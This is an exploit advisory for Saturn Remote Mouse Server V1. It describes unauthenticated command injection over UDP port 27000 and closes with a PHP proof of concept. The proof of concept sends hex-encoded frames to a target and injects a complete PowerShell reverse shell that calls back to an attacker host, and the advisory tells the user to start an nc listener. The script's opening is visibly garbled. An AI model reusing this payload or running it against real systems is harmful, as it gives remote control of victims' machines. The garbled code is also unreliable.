=============================================================================================================================================
| # Title     : Saturn Remote Mouse Server V1 - UDP-based Command Injection Vulnerability
| # Author    : indoushka
| # Tested on : Windows 11 Fr (Pro) / browser : Mozilla Firefox 145.0.2 (64 bits)
| # Vendor    : https://www.saturnremote.com/
=============================================================================================================================================

[+] Summary : A service component of Saturn Remote Mouse Server listens on UDP port 27000 and accepts unauthenticated JSON-like frames. Improper input handling allows specially crafted frames to cause execution of arbitrary commands in the context of the service process, resulting in Remote Code Execution (RCE) on the target host from anywhere on the local network.

[+] Impact : Remote, unauthenticated attackers on the same local network can send malformed or specially crafted UDP packets that the server parses and forwards to a command execution sink, enabling arbitrary code execution under the service account. This may result in full system compromise, depending on the privileges of the service. Because the frames are not authenticated, exposure is bounded only by network reachability of UDP port 27000; a host firewall rule limiting that port to trusted devices reduces the attack surface.

[+] Vectors :
- UDP packets containing JSON frames (port 27000) whose fields are concatenated into, or passed directly to, OS execution functions or PowerShell without validation or sanitization.
- No authentication or origin validation was observed for packets arriving from the local network.

[+] POC : php poc.php --lhost 192.168.1.3 --lport 4444 --lport \n"; exit(1); } $lhost = $options['lhost']; $lport = intval($options['lport']); $UDP_IP = "192.168.1.109"; $UDP_PORT = 27000; $messages = [ "7b224973436f6e6e656374696e67223a2274727565227d", "7b22636f6e6e656374696f6e223a2022616374697665227d", "7b2241726561486569676874223a302c22417265615769647468223a302c22436f6d6d616e644e616d65223a225354415254222c2258223a302c2259223a307d", "7b224b6579223a22636d64227d", "7b224b6579223a225c6e227d", ]; $ps_command = "powershell -nop -c \"\$client = New-Object System.Net.Sockets.TCPClient('$lhost',$lport);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\""; $hex_ps = bin2hex("{\"Key\": \"$ps_command\"}"); $messages[] = $hex_ps; $messages[] = "7b224b6579223a225c6e227d"; echo "[*] Sending UDP packets to $UDP_IP:$UDP_PORT\n"; echo "[*] Target listener: $lhost:$lport\n\n"; foreach ($messages as $i => $hex_msg) { $data = hex2bin($hex_msg); if ($data === false) { echo "[!] Invalid hex for message " . ($i + 1) . "\n"; continue; } $fp = fsockopen("udp://$UDP_IP", $UDP_PORT, $errno, $errstr); if (!$fp) { echo "[!] Cannot open UDP socket: $errstr ($errno)\n"; break; } fwrite($fp, $data); fclose($fp); echo "[+] Sent packet " . ($i + 1) . " (" . strlen($data) . " bytes)\n"; sleep(1); } echo "\n[+] All packets sent!\n"; echo "[*] Start your listener: nc -nlvp $lport\n"; } main(); Greetings to :===================================================================================== jericho * Larry W. 
Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================